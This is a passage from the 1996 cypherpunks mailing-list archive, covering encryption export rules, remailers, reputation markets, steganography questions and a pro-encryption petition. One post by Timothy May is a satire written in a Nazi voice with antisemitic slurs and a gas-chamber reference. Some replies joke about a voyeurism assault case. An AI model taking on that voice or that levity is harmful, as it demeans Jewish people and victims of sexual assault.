in.  So you could say that it is absolutely necessary for the web 
to have that feature as well.


> of some third party in providing ultimate traceability. I'm not wild about
> the U.S. Government being this third party

NO WAY, These guys are in my life enough already, and you can't trust 
them anyway!!!!

Ross

===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gsi@juno.com (Floyd W Odom)
Date: Thu, 5 Sep 1996 14:24:41 +0800
To: cypherpunks@toad.com
Subject: GSI
Message-ID: <19960904.200214.3230.2.GSI@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


From: GSI
Full-Name: Floyd W Odom
To: Bugtraq
Subject: GSI
Message-ID: <19960904.195621.3230.0.GSI@juno.com>
X-Status: Unsent
X-Mailer: Juno 1.15

Dear Recipient,	We at Galaxy Software would like to offer you a
chance to buy software over the magic of e-mail. How it works is you can
send us here at GSI(Galaxy Software Inc.) e-mail orders from our software
list telling us that the check or money order is in the mail. To e-mail
us just send a letter to GSI@JUNO.COM. For more information you can
e-mail at: doom13@juno.com.1. CGW Game Pack2. One must fall
2097	3. Decsent 24. CD Sampler: Volume Two5. Cannon Creative6.
Animation Festival7. Duke Nukem 3D8. Doom9. World Atlas10. Crime City11.
Airforce Combat12. GT Personel Accounting13. Wolfenstein 3D14. Print
Master Gold15. Chaos16. Wizardry17. Corel 618. America Online 3.019.
Power Chute Plus Demo20. UPC Doctor21. Epic Pinball: Enigma22. Epic
Pinball: Android23. Epic Pinball: 1, 2, 324. Jazz Jackrabbit: Holiday
Hare25. Jazz Jackrabbit: All*




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 5 Sep 1996 16:07:33 +0800
To: cypherpunks@toad.com
Subject: Re: ZD Net Registration
Message-ID: <ae53bae201021004fe71@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:45 AM 9/5/96, Carl Ellison wrote:
>http://community.zdnet.com/register/register.cgi
>
>Check this out!  Harvesting Mother's Maiden Name.
>I wonder how many they get each hour....

"Think of it as evolution in action."

I tried to register as "foobar," but the name was taken. So I added a few bits.

I used "fuckyou" as my mother's maiden name (no pun intended).

So now I'm an full-fledged member of ZD Net, fuck you very much.

The more things change...

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gsi@juno.com (Floyd W Odom)
Date: Thu, 5 Sep 1996 14:24:36 +0800
To: cypherpunks@toad.com
Subject: GSI
Message-ID: <19960904.200349.3230.3.GSI@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


From: GSI
Full-Name: Floyd W Odom
To: Bugtraq
Subject: GSI
Message-ID: <19960904.195621.3230.0.GSI@juno.com>
X-Status: Unsent
X-Mailer: Juno 1.15

Dear Recipient,	We at Galaxy Software would like to offer you a
chance to buy software over the magic of e-mail. How it works is you can
send us here at GSI(Galaxy Software Inc.) e-mail orders from our software
list telling us that the check or money order is in the mail. To e-mail
us just send a letter to GSI@JUNO.COM. For more information you can
e-mail at: doom13@juno.com.1. CGW Game Pack2. One must fall
2097	3. Decsent 24. CD Sampler: Volume Two5. Cannon Creative6.
Animation Festival7. Duke Nukem 3D8. Doom9. World Atlas10. Crime City11.
Airforce Combat12. GT Personel Accounting13. Wolfenstein 3D14. Print
Master Gold15. Chaos16. Wizardry17. Corel 618. America Online 3.019.
Power Chute Plus Demo20. UPC Doctor21. Epic Pinball: Enigma22. Epic
Pinball: Android23. Epic Pinball: 1, 2, 324. Jazz Jackrabbit: Holiday
Hare25. Jazz Jackrabbit: All*




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 5 Sep 1996 16:32:47 +0800
To: Kent Briggs <72124.3234@compuserve.com>
Subject: Re: rc2 export limits..
Message-ID: <199609050609.XAA17556@dfw-ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm afraid my source is "Read it on the net and was surprised to hear it".
My assumption is that the limit is for software that implements
both signature and verification, since ITAR doesn't ban export of
pure-authentication software.

Is the State Dept doc on the net?  It would be nice to have something
saying there are well-defined rules that they agree to follow,
unreasonable and unconstitutional though they may be.

At 12:06 PM 9/4/96 -0400, Kent Briggs <72124.3234@compuserve.com> wrote:
>stewarts@ix.netcom.com wrote:
>> However, the usual guidelines for systems like RC2 and RC4 is
>> 40-bit keys, and RSA keys up to 512 bits for encrypting
>> session keys and 1024 bits for signatures
>
>Can you list a source for the 1024-bit signature restriction?  I know
>about the 40-bit RC2/RC4 and 512-bit public encryption keys because they
>are specifically addressed in the State Dept's "Procedure for Submitting
>a Commodity Jurisdiction Request for a Mass Market Software Product that
>Contains Encryption".  However, digital signatures are not mentioned in
>this procedure.  I can't image what justificication could be used to
>restrict the strength of digital signatures.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Thu, 5 Sep 1996 16:44:28 +0800
To: "Declan McCullagh" <deviant@pooh-corner.com>
Subject: Re: Internet blamed in shoe-cam crimes, assailant free on $750 bail
Message-ID: <19960905062418656.AAA164@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 4 Sep 1996 23:31:29 -0400 (EDT), The Deviant wrote:

>> He said the man was detected by two couples who noticed him moving his
>> foot under the skirt of a woman.  They followed the man, held him and
>> called police.
>> Police ask women who feel they've been victimized to call 808-5289.
>> George Walter Campbell, 62, of Cornwall, has been charged with sexual
>> assault and mischief.  He returns to College Park court on Sept. 10.
>> He was released on $750 cash bail yesterday.

>Hrmm.. I can see how its _wrong_, but exactly how is looking under
>somebodies skirt _assault_?

Mischief is true.  However it does get back to the eventual question:  if they
are giving off radiation, are we guilty receiving them?   For instance, if you
have your pot sensing IR camera in a plane, do you need a search warrant?   If
you walk around with a scanner listening to cell-phones is it illegal?

One can also imagine a sewer worker getting sued for looking out of one of
those cover grill things. (Perhaps up at a cover girl. Pun intended.)

- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Thu, 5 Sep 1996 16:40:38 +0800
To: cypherpunks@toad.com
Subject: Re: Reputations
Message-ID: <v02140b00ae542bed2ead@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain



Greg Burk writes:
> Too little incentive to shoot for the heights:
>
> Suppose you judge that you've accumulated twice as much "reputation
> capital" as Joe. How do you get twice as much payoff? It seems to me
> that above the threshhold of credibility, minor side issues make more
> difference than your two-fold "reputation capital" differential.

Go read Ender's Game by Orson Scott Card (a good book to read anyway :)
and examine the nature of the computer network "discussion groups" he talks
about: a classic example of reputation markets in many-to-many discussions.
With the proper tools someone with twice the reputation capital in a
particular category as another will have a greater chance of what they say
not being filtered out as noise.

> As an "asset", it is extremely non-liquid:
>
> How exactly would you "convert" your reputation into other capital?
> Would you accept bribes and tell lies? Seems to me you would only get a
> one-shot "conversion" and it couldn't possibly hope to equal your
> investment.

Tell that to Walter Cronkite, Siskel & Ebert, Moody's and others who have
converted reputation capital into large piles of money.  Time is an asset
that has a monetary value to most people, and they are willing to spend money
to hear the opinions of sources which they feel have a high reputation in
a particular area rather than spending the time necessary to do the research
and investigation themselves.

> So I think the latter part of the analysis is wishful thinking, or at
> least restricted to a small subset of subject-matter.

No, I think that you just don't understand the mechanics of reputations and
how they interact with the most important resource in most people's lives:
time.  Instead of thinking of "reputation" look at it from the other end and
consider the "attention marketplace."  Right now reputation markets have a
limited presence on the internet (mostly through killfiles) because the tools

required are not integreated into the tools used to browse the information.
In time this will change.

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Thu, 5 Sep 1996 14:06:40 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: Internet blamed in shoe-cam crimes, assailant free on $750 bail
In-Reply-To: <v01510115ae53a68f5a40@[204.62.128.229]>
Message-ID: <Pine.LNX.3.94.960904232934.225A-100000@anx0918.slip.appstate.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 4 Sep 1996, Declan McCullagh wrote:

 
> He said the man was detected by two couples who noticed him moving his
> foot under the skirt of a woman.  They followed the man, held him and
> called police.
> 
> Police ask women who feel they've been victimized to call 808-5289.
> 
> George Walter Campbell, 62, of Cornwall, has been charged with sexual
> assault and mischief.  He returns to College Park court on Sept. 10.
> He was released on $750 cash bail yesterday.
> 

Hrmm.. I can see how its _wrong_, but exactly how is looking under
somebodies skirt _assault_?

 --Deviant
"Obviously, a major malfunction has occurred."
                -- Steve Nesbitt, voice of Mission Control, January 28,
                   1986, as the shuttle Challenger exploded within view
                   of the grandstands.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Voters Telecommunications Watch <shabbir@vtw.org>
Date: Thu, 5 Sep 1996 15:02:05 +0800
To: cypherpunks@toad.com
Subject: ALERT: Join thousands of net users in their fight against the White House! (9/4/96)
Message-ID: <199609050413.AAA03766@panix3.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


=============================================================================
          ____                  _              _   _
         / ___|_ __ _   _ _ __ | |_ ___       | \ | | _____      _____
        | |   | '__| | | | '_ \| __/ _ \ _____|  \| |/ _ \ \ /\ / / __|
        | |___| |  | |_| | |_) | || (_) |_____| |\  |  __/\ V  V /\__ \
         \____|_|   \__, | .__/ \__\___/      |_| \_|\___| \_/\_/ |___/
                    |___/|_|

      NET LUMINARIES JOIN THOUSANDS IN SIGNING PRO-ENCRYPTION PETITION
		       http://www.crypto.com/petition/
    CRYPTO ACTION WEEK ENDS WITH JUDICIARY HEARING ON HR 3011 (9/11/96)

                          Date: September 4, 1996

         URL:http://www.crypto.com/            crypto-news@panix.com
           If you redistribute this, please do so in its entirety,
                         with the banner intact.
-----------------------------------------------------------------------------
Table of Contents
        Introduction
        Join Phil Zimmermann, Bruce Schneier, and other cyber luminaries!
        How to receive crypto-news
        Press contacts

-----------------------------------------------------------------------------
INTRODUCTION

This week is a hard week for many working on the encryption issue.  The
House pro-encryption bill, SAFE (HR 3011), will have a hearing in the
Judiciary committee on September 11.  Between now and then, individuals
and industry representatives will be calling on their legislators to support
HR 3011.

On the other side of the issue, the White House is expected to release their
"solution" to the encryption debate no earlier than September 8th.  It will
surprise no one if it is designed to be in the best interests of law
enforcement with concerns for privacy placed dead last.

Be a part of this assault on the White House by signing the pro-encryption
petition at http://www.crypto.com/petition/

-----------------------------------------------------------------------------
JOIN PHIL ZIMMERMANN, BRUCE SCHNEIER, AND OTHER CYBER LUMINARIES!

The following petition can be signed onto at http://www.crypto.com/petition/

	The Information Revolution is being held hostage by an
	outdated, Cold War-era U.S. encryption policy.

	Current U.S. export controls and other initiatives are slowing
	the widespread availability of strong encryption products,
	endangering the privacy and security of electronic
	communications, harming the competitiveness of U.S. businesses,
	and threatening the future of electronic commerce and the
	growth of the Global Information Infrastructure (GII).

	We the undersigned Internet users and concerned citizens
	strongly support Congressional efforts to address this critical
	issue. Bills are currently pending in both Houses of Congress
	which would:

	-Relax export controls on encryption technology;
	-Prohibit the government from imposing "Key Escrow" solutions
	 domestically; and
	-Recognize the importance of privacy and security for the future of
	 electronic commerce, individual liberty, and the success of the
	 Internet.

	We urge Congress to act NOW to enact a U.S. encryption policy that
	promotes electronic privacy and security.


Join Phil Zimmerman, author of Pretty Good Privacy (PGP), Bruce Schneier,
author of "Applied Cryptography", Dr. Matt Blaze of Tessera card fame, Phil
Karn and Vince Cate as they pressure the White House to change their
wrong-headed encryption policies.

Add your name to theirs at http://www.crypto.com/petition/  !

-----------------------------------------------------------------------------
HOW TO RECEIVE CRYPTO-NEWS

To subscribe to crypto-news, sign up from our WWW page (http://www.crypto.com)
or send mail to majordomo@panix.com with "subscribe crypto-news" in the body
of the message.  To unsubscribe, send a letter to majordomo@panix.com with
"unsubscribe crypto-news" in the body.
-----------------------------------------------------------------------------
PRESS CONTACT INFORMATION

Press inquiries on Crypto-News should be directed to
	Shabbir J. Safdar (VTW) at +1.718.596.2851 or shabbir@vtw.org
	Jonah Seiger (CDT) at +1.202.637.9800 or jseiger@cdt.org

-----------------------------------------------------------------------------
End crypto-news
=============================================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@zifi.genetics.utah.edu (Anonymous)
Date: Thu, 5 Sep 1996 16:56:13 +0800
To: cypherpunks@toad.com
Subject: Re: Race Bit: C
Message-ID: <199609050630.AAA07395@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


>At 02:47 AM 9/4/96 -0700, Timothy C. May wrote:
>>At 3:02 AM 9/4/96, James A. Donald wrote:
>>>At 10:33 PM 9/3/96 -0800, jim bell wrote:

<...>

[I am unsure just *who* wrote:]

>>As the recent discussion of knives, switchblades, and throwing stars
>>showed, such ambiguous laws are often used to keep the coloreds down.

Gunlaws and druglaws have deep roots in racism, but it is politically
incorrect to say, even if I can find it in the congressional record.
[and I can.]

But then it was certainly Jim Bell who wrote:

>Perhaps the most ominous part of making "use of encryption to thwart an 
>investigation" illegal is _not_ that remailer operators might be prosecuted, 
>but that they might NOT be prosecuted in a deal where (in exchange for not 
>being prosecuted) they continue to operate the remailer, "cracked" or 
>sabotaged so that they share all the info with the cops.  While even that 
>won't make chained remailers totally useless, eventually suspicions of such 
>a crack will surface, which will help sabotage the credibility of all >remailers, not just the ones that have been "stung."  

If someone tried a scheme involving violence such as A. P. through
a remailer I was involved in, the feds would not have to threaten me
with prosecution to get me to cooperate with them. I may not keep any
logs right now, Jim, but if your little scheme gets underway I will
cooperate willingly as long as I don't compromise the privacy of non-
violent people such as drug users & sellers. For them, I would go to
jail; for you, I would even cooperate with the BATF (which should be
defunded 100%, IMO). Violence begats violence which begats even larger
government, don't start us on that road -- leave me in peace.










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@cybercash.com>
Date: Thu, 5 Sep 1996 14:57:23 +0800
To: banisar@epic.org
Subject: ZD Net Registration
Message-ID: <322E5ADD.124@cybercash.com>
MIME-Version: 1.0
Content-Type: text/plain


http://community.zdnet.com/register/register.cgi

Check this out!  Harvesting Mother's Maiden Name.
I wonder how many they get each hour....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ISP-TV Main Contact <isptv@access.digex.net>
Date: Thu, 5 Sep 1996 17:17:49 +0800
Subject: No Subject
Message-ID: <199609050626.CAA28796@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


*** ISP-TV Program Announcement: Meeks Interview ***

Monday, September 9 
9:00 PM ET

Brock Meeks
Chief Washington Correspondent for WIRED and HotWIRED

WIRED's chief muckraking journalist will join ISP-TV for a discussion of
the the technology policy underbelly of Washington, D.C, ranging from the
Communications Decency Act to pornography in the bathrooms of the Senate
Russell Building.

This video interview can be viewed on the ISP-TV main CU-SeeMe reflector
at IP 205.197.247.33, or other ISP-TV affiliate reflectors listed at
http://www.digex.net/isptv/members.html

There will be a call-in number for questions, and we will be monitoring
EFnet IRC channel #isptv

See URL http://www.digex.net/isptv for more information about the ISP-TV
Network





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rebecca L Madden <madden+@andrew.cmu.edu>
Date: Thu, 5 Sep 1996 19:32:51 +0800
To: cypherpunks@toad.com
Subject: up
In-Reply-To: <v01510115ae53a68f5a40@[204.62.128.229]>
Message-ID: <Em=bgVK00iWWAIuF0v@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


it's three o four.
I'm up.

Becky Madden
#(412)-862-2934


//<@>\\*//<@>\\*//<@>\\*//<@>\\*//<@>\\*//<@>\\

I believe that imagination is stronger than knowledge-
That myth is more potent than history.
I believe that dreams are more powerful than facts-
That hope always triumphs over experience-
That laughter is the only cure for grief.
And I believe that love is stronger than death.

    -Robert Fulghum 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Thu, 5 Sep 1996 16:10:03 +0800
To: cypherpunks@toad.com
Subject: WinSock Remailer Available Overseas
Message-ID: <199609050553.HAA12430@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


The Winsock remailer announced by Joey Grasty available at
Obscura, an access-contolled site on August 21, became available
August 26 at at least five overseas sites, one of which is

   ftp://ftp.replay.com/pub/replay/pub/remailer/wsa12.zip

OK, let's get some more non-USA remailers running!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Fri, 6 Sep 1996 17:55:21 +0800
To: "D. Moeller" <moe-san@stadt.com>
Subject: Re: FWD: Another try to kill democracy
In-Reply-To: <322EA63D.35B5@stadt.com>
Message-ID: <Pine.SUN.3.91.960905081519.10506A-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


That was my first thought, but it appears the ban is being implemented, 
albeit slowly. Check out my message of about 12 hours ago on the topic.

-Declan


On Thu, 5 Sep 1996, D. Moeller wrote:

> James A. Donald wrote:
> > 
> > At 09:53 PM 9/2/96 +0000, SPG wrote:
> > > I just got wind that the German government is planning to force german
> > > ISP's to shut off access to my ISP, XS4ALL, because the german magazine
> > >'Radikal' has a web page on xs4all.
> 
> <..>
>  
> > How serious is this threat?
> 
> No problem in gaining access so far. I even traces through Telekom and
> C-Serve - no trace of restrictions.
> 
> Maybe just a way to generate traffic to a lame site?
> 
> Cheers Moe!
> -- 
> 
> D. Moeller at WebLab U-Agency GmbH   
> webadmin@stadt.com  http://www.stadt.com/u-agency/ 
> moe-san@elcafe.com  http://www.elcafe.com/~moe-san/
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Stiennon <richards@netrex.com>
Date: Fri, 6 Sep 1996 01:26:36 +0800
To: jfricker@vertexgroup.com (John F. Fricker)
Subject: Re: 2^1,257,787-1
Message-ID: <2.2.32.19960905122436.00b04674@trex.netrex.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:54 AM 9/4/96 -0700, John F. Fricker wrote:
>Ok so maybe here in Organ we are a little behind the times but I just heard
>about this 378,632 digit prime. Grab your HP11C's and crank out
>2^1,257,787-1 courtesy of David Slowinski at Cray.

Is there a URL for the entire number? Or could someone post it to the list?
<grin>
----------------------------------------------------------------------------
Richard Stiennon			richards@netrex.com
Director, Business Development		http://www.netrex.com 
Netrex, Inc.			Voice: 810-352-9643
Southfield, Michigan 	 		Fax: 810-352-2375
-----------------------------------------------------------------------------
Providing businesses and organizations with secure Internet solutions.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <bkmarsh@feist.com>
Date: Fri, 6 Sep 1996 02:18:30 +0800
To: cypherpunks@toad.com
Subject: Re: Internet blamed in shoe-cam crimes, assailant free on $750 bail
In-Reply-To: <Pine.3.89.9609042135.A29446-0100000@well.com>
Message-ID: <Pine.BSI.3.91.960905083439.27097B-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 4 Sep 1996, Declan McCullagh wrote:

> > Hrmm.. I can see how its _wrong_, but exactly how is looking under
> > somebodies skirt _assault_?
> 
> Why is this wrong? Information wants to be free!
> 
> More to the point, boys used to put mirrors on their shoes. Now they 
> learn about shoecams on the Net.

    I'm working on some nanotech bots to take care of everything now.  
With a little more work I'm sure they'll be able to actually 
later reproduce the 'target' in life-like synthetics.  Uhh.. any 
investors interested? :)

                       ________________________________
                      [ Bruce M. - Feist Systems, Inc. ]
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
     "Official estimates show that more than 120 countries have or are 
      developing [information warfare] capabilities." -GAO/AIMD-96-84
                         So, what is your excuse now?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 6 Sep 1996 19:15:48 +0800
To: Asgaard <cypherpunks@toad.com
Subject: Re: ... subversive leftists
Message-ID: <ae544a4003021004ad89@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:23 AM 9/5/96, Asgaard wrote:
>On Wed, 4 Sep 1996, Declan McCullagh wrote:
>
>> The German Generalbundesanwaltschaft (Chief Federal Prosecutor's
>> office) has "advised" the Internet providers to block access to
>
>> "Radikal" (http://www.xs4all.nl/~tank/radikal) is a publication
>> from the radical left that is illegal in Germany, but not in
>> the Netherlands.
>
>This is amazing. Without defending the German stand on the Revisionist
>crap, that part is at least understandable in a historical context
>(their sense of guilt for the unfortunate developments in the 30's
>and 40's etc). But a quick overview of the contents of Radikal gives the
>impression of an ordinary leftist zine, defining the outlawing of it as
>pure political censorship in a Western 'democracy'. I'm truly surprised.

Leftists are despicable. They steal our money, they corrupt our politics,
they nationalized our industries, they subvert our ideals, and they
undermine our national will.

The Democratic People's German Reich is fully justified in cutting off
contacts with subversive radical publications in Jew-dominated nations like
Holland.

As Reichskommander Schmidt points out: "The citizen-units who access
foreign Web sites will be rounded up and disposed of like the vermin they
are. We cannot allow the Revisionists and Leftists to triumph. We will send
them to the showers."

Heil Freeh!

--Klaus






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P. J. Ponder" <ponder@freenet.tlh.fl.us>
Date: Fri, 6 Sep 1996 02:11:32 +0800
To: cypherpunks@toad.com
Subject: Re: rc2 export limits..
Message-ID: <Pine.OSF.3.91.960905084320.30700A-100000@fn3.freenet.tlh.fl.us>
MIME-Version: 1.0
Content-Type: text/plain



keywords:  ITAR, SHA, beneficial and innocuous crypto

The persistent reputation known as Bill Stewart wrote:

>Date: Wed, 04 Sep 1996 23:09:17 -0700
>From: Bill Stewart <stewarts@ix.netcom.com>
>To: Kent Briggs <72124.3234@compuserve.com>
>Cc: cypherpunks@toad.com
>Subject: Re: rc2 export limits..
>
>I'm afraid my source is "Read it on the net and was surprised to hear it".
>My assumption is that the limit is for software that implements
>both signature and verification, since ITAR doesn't ban export of
>pure-authentication software.

The FIPS Pub (?180? ?181?) for the Secure Hash Algorithm (SHA) states in 
the fine print at the beginning that SHA is export controlled.  I don't 
have the document to refer to right now, but it plainly states that SHA  
falls under ITAR.  As a cryptographic hash function, why would it be 
controlled in this way?

How can I use SHA to encrypt something for someone else to decrypt?  I 
know how to use it for authentication; am I missing something here?

ANFSCD:

I tried that OnNet32 e-mail software from FTP software.  It runs under 
Windows95.  It is a lot of material to download, and way too intrusive to 
install.  It wants to metastasize itself into the innards of Microsoft 
Exchange and Inboxes, etc.  What is it with all this complexity anyway?  
Why not just have a POP client that will check mail on the server?

It also wants you to store your mailbox password in it, as opposed to 
letting you enter it on a session-by-session basis.  I don't like that.

sticking with PINE, PGP, and Xywrite II for now.... 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Campbell <campbell@c2.net>
Date: Fri, 6 Sep 1996 02:21:04 +0800
To: cypherpunks@toad.com
Subject: NYT on penet closure
Message-ID: <9609051348.AA16186@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

http://www.nytimes.com/library/cyber/week/0905remail.html


September 5, 1996

Scientology Case and Finnish Law
Blamed for Demise of Remail Service

By PAMELA MENDELS

The issue, Johan M. Helsingius insists, was not pornography but
privacy.

Helsingius, the Finnish volunteer who shook the online community last
week with the announcement that he was closing his popular anonymous
remailer service, said in an interview on Wednesday that he had acted
because he believes that Finland today offers inadequate privacy
protection to Internet users.

	The only thing I am concerned with is that the
	threshold of protection for the Internet should be the
	same as for ordinary postal mail or phone calls.


	Johan M. Helsingius

[ I've deleted the rest of the article.  See the URL above for the
  full text. -Rick						   ]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMi7aJhj0UvMeUesFAQHEHwP+N+MB+YrO1HfxXJx5v+z6PCMcwCREpvYN
/HZGzdlvh4z1A0viQluGjkhDe0Xo/gLfiCxzsVM92zWEBhzh5cYiWDO0gj5tJklc
nU/WPVOpz7+W/JR495NwcDFKiHUQU/nInq26ixVTPi+56YHG2cTl61iHc7b1Pnt0
jBVa+8V9WTM=
=kigF
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: makof@alias.cyberpass.net (makofi)
Date: Fri, 6 Sep 1996 06:16:45 +0800
To: cypherpunks@toad.com
Subject: Re: Steganography -- Tell-tale signs?
Message-ID: <199609051649.JAA06578@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi there!

I'd appreciate some help from you experts in 
steganography.

1) If I hide some PGP encrypted data in a
gif, jpg or wav file will there be any tell tale 
signs to the naked eye of an expert? If yes,
what are they?

2) Would it better to hide the data in 
a jpg with black and white image rather
than a color one?

3) Are there any tools at the moment 
to expose (not crack) the hidden encrypted 
data? If none. are there tools in development?

If this appears twice please accept my apologies.
I didn't see the first posting and so I assumed it 
was lost in transit. Please email replies to me 
directly if this is off-topic. Thank you.

Makofi





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: makof@alias.cyberpass.net (makofi)
Date: Fri, 6 Sep 1996 19:12:50 +0800
To: cypherpunks@toad.com
Subject: Re: Steganography -- Tell-tale signs?
Message-ID: <199609051650.JAA06725@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi there!

I'd appreciate some help from you experts in 
steganography.

1) If I hide some PGP encrypted data in a
gif, jpg or wav file will there be any tell tale 
signs to the naked eye of an expert? If yes,
what are they?

2) Would it better to hide the data in 
a jpg with black and white image rather
than a color one?

3) Are there any tools at the moment 
to expose (not crack) the hidden encrypted 
data? If none. are there tools in development?

If this appears twice please accept my apologies.
I didn't see the first posting and so I assumed it 
was lost in transit. Please email replies to me 
directly if this is off-topic. Thank you.

Makofi





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: makof@alias.cyberpass.net (makofi)
Date: Fri, 6 Sep 1996 18:22:36 +0800
To: cypherpunks@toad.com
Subject: Re: Steganography -- Tell-tale signs?
Message-ID: <199609051651.JAA06856@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi there!

I'd appreciate some help from you experts in 
steganography.

1) If I hide some PGP encrypted data in a
gif, jpg or wav file will there be any tell tale 
signs to the naked eye of an expert? If yes,
what are they?

2) Would it better to hide the data in 
a jpg with black and white image rather
than a color one?

3) Are there any tools at the moment 
to expose (not crack) the hidden encrypted 
data? If none. are there tools in development?

If this appears twice please accept my apologies.
I didn't see the first posting and so I assumed it 
was lost in transit. Please email replies to me 
directly if this is off-topic. Thank you.

Makofi





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@tc.umn.edu>
Date: Fri, 6 Sep 1996 17:37:01 +0800
To: stewarts@ix.netcom.com
Subject: Re: Anonymity (re: the Esther Dyson issue)
In-Reply-To: <9609042054.AB16740@anchor.ho.att.com>
Message-ID: <322eea225b5e002@noc.tc.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


stewarts@IX.NETCOM.COM said:
> In Tim's Cyphernomicon, he says
>         - I have heard (no cites) that "going masked for the purpose
>               of going masked" is illegal in many jurisdictions. Hard to
>               believe, as many other disguises are just as effective and
>               are presumably not outlawed (wigs, mustaches, makeup,
>               etc.). I assume the law has to do with people wearning ski
>               masks and such in "inappropriate" places. Bad law, if real.
> 
> A lot of the motivation was to stop the Ku Klux Klan terrorism.
> On the other hand, the reason it was mentioned on the list a couple
> years ago was that a woman was arrested in some North Central city,
> probably Detroit, for violating it, because she was wearing a
> Middle-Eastern-style chador outfit that covered her face.
> 

That would be St Paul, MN. If I recall, the arrest was thrown out
(and possibly the law overturned).

I can look for references if anyone cares.

-- 
Kevin L. Prigge                     | "I rarely saw people sitting at
Systems Software Programmer         |  computers producing real code
Internet Enterprise - OIT           |  wearing ties." - Philippe Kahn
University of Minnesota             | (speech at Software Development '90)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 6 Sep 1996 06:11:46 +0800
To: Stephan Schmidt <cypherpunks@toad.com
Subject: Herr Schmidt
Message-ID: <ae54579106021004ce78@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:20 PM 9/5/96, Stephan Schmidt wrote:

>Definetly not.
>There is an advisory from the Generalbundesanwaltschaft and
>the ICTF that ISPs should ('have to') restrict the access to
>those urls.
>
>But so far nothing happend. I asked some people
>to try the urls and there where no restrictions.
>(I encounterd no restrictions myself.)

By the way, I used the name "Schmidt" in my satire post, sent out earlier
this morning. I picked that name randomly, being a common German name
(cognate to Smith, I believe), and meant nothing with regard to Stephan.

